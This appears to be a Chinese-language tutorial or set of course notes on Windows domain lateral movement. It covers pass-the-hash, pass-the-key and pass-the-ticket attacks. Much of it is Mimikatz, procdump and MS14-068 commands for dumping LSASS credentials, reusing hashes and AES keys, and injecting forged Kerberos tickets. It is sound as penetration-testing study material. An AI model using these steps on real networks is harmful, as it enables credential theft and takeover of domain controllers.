內網安全:橫向傳遞攻擊.
橫向移動就是在拿下對方一臺主機后,以拿下的那臺主機作為跳板,對內網的其他主機再進行后面滲透,利用既有的資源嘗試獲取更多的憑據、更高的權限,一步一步拿下更多的主機,進而達到控制整個內網、獲取到最高權限、發動高級持續性威脅攻擊的目的.(傳遞攻擊主要建立在明文和Hash值獲取基礎上進行攻擊.)
目錄:
內網安全:橫向傳遞攻擊.
知識點補充:
(1)PTH:利用 lm 或 ntlm 的值進行的滲透測試
(2)PTK:利用的 ekeys aes256 進行的滲透測試
(3)PTT:利用的票據憑證 TGT 進行的滲透測試
Procdump+Mimikatz 配合獲取目標主機密碼:
PTH 傳遞( Mimikatz )
PTK 傳遞( Mimikatz )
PTT 傳遞(?MS14--068?)
知識點補充:
(1)PTH:利用 lm 或 ntlm 的值進行的滲透測試
(windows系統LM Hash及NTIM Hash加密算法,個人系統在windows vista后服務器系統在windows 2003以后,認證方式均為NTIM Hash.)
(2)PTK:利用的 ekeys aes256 進行的滲透測試
(3)PTT:利用的票據憑證 TGT 進行的滲透測試
PTH 在內網滲透中是一種很經典的攻擊方式,原理就是攻擊者可以直接通過 LM Hash 和 NTLM Hash?
訪問遠程主機或服務,而不用提供明文密碼.
總結:KB2871997 補丁后的影響
(1)PTH:沒打補丁用戶都可以連接,打了補丁只能 administrator 連接
(2)PTK:打了補丁才能用戶都可以連接,采用 aes256 連接?
PTT 攻擊的部分就不是簡單的 NTLM 認證了,它是利用 Kerberos 協議進行攻擊的,這里就介紹三種常見的攻擊方法:MS14-068,Golden ticket,SILVER ticket,簡單來說就是將連接合法的票據注入到內存中實現連接.
MS14-068 基于漏洞:Golden ticket(黃金票據),SILVER ticket(白銀票據)
其中Golden ticket(黃金票據),SILVER ticket(白銀票據)屬于權限維持技術.
MS14-068 造成的危害是允許域內任何一個普通用戶,將自己提升至域管權限。微軟給出的補丁是kb3011780
Procdump+Mimikatz 配合獲取目標主機密碼:
下載procdump工具:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump下載Mimikatz工具:https://github.com/gentilkiwi/mimikatz/releases
想方法把 procdump 上傳在目標主機上.
然后執行這個命令,生成一個 lsass.dmp 文件.(再把他下載在我們主機上進行分析)procdump -accepteula -ma lsass.exe lsass.dmp
在 mimikatz 上執行:(1)privilege::debug(2)sekurlsa::minidump lsass.dmp(3)sekurlsa::logonPasswords full
PTK:采用是 aes256 密文,那 aes256 密文怎么獲取的:(再在 mimikatz 上執行)sekurlsa::ekeys
PTH 傳遞( Mimikatz )
PTH ntlm 傳遞.(在 Mimikatz 上執行)sekurlsa::pth /user:administrator /domain:god /ntlm:209c6174da490caeb422f3fa5a7ae634新開出來一個cmd窗口:在里面連接(隨機的攻擊,所以你也不知道是哪個IP地址): die //要連接的IP地址\C$ sekurlsa::pth /user:用戶名 /domain:域名 /ntlm:域里面的密文密碼.(域)sekurlsa::pth /user:administrator /domain:workgroup /ntlm:209c6174da490caeb422f3fa5a7ae634新開出來一個cmd窗口:在里面連接(隨機的攻擊,所以你也不知道是哪個IP地址): die //要連接的IP地址\C$ sekurlsa::pth /user:用戶名 /domain:工作組 /ntlm:密文密碼.(組)
PTK 傳遞( Mimikatz )
PTK aes256 傳遞:(在 Mimikatz 上執行)sekurlsa::pth /user:administrator /domain:workgroup /aes256:4d3963f9bca16812119a7784a5bae5fcc9f5ba35eb769a89cdaba067fddf7335新開出來一個cmd窗口:在里面連接(隨機的攻擊,所以你也不知道是哪個IP地址): die //要連接的IP地址\C$
PTT 傳遞(?MS14--068?)
第一種利用漏洞:(MS14-068 powershell 執行)
(能實現普通用戶直接獲取域控 system 權限)(1)whoami/user // 查看當前SID地址
(2)利用 ms14-068 生成 TGT 數據:ms14-068.exe -u 域成員名@域名 -s sid -d 域控制器地址 -p 域成員密碼MS14-068.exe -u win2016@vnlntarget.com -s S-1-5-21-2387719572-2208999834-2475545985-500 -d 10.0.10.110 -p Admin#123
(3)kerberos::purge //(mimikatz中)清空當前機器中所有憑證,如果有域成員憑證會影響憑證偽造(4)kerberos::list //(mimikatz中)查看當前機器憑證(5)kerberos::ptc 票據文件 //(mimikatz中)將票據注入到內存中(6)票據注入內存:mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit(7)查看憑證列表 klist(8)利用:dir \\192.168.3.21\c$
? ?
學習鏈接: 第68天:內網安全-域橫向PTH&PTK&PTT哈希票據傳遞_嗶哩嗶哩_bilibili